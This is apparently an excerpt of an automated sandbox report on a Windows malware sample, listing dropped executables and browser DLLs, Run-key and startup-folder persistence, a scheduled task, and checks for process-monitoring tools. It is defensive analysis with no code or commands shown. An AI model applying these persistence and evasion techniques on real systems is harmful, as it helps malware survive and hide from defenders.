Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6dce78ba2b.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5c7128cd0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c92938c010.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bd330404c.exe	Jump to behavior

Drops script or batch files to the startup folder

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Jump to dropped file

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Window searched: window name: PROCMON_WINDOW_CLASS

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AutoRun_WindosCPUsystem.bat

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c92938c010.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c92938c010.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bd330404c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2bd330404c.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5c7128cd0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b5c7128cd0.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6dce78ba2b.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6dce78ba2b.exe	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{BB52E685-57DB-490D-A4DD-CCF2F7D90D58} {2DD5D29F-1CE3-49E7-8572-9D856412ED59}

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
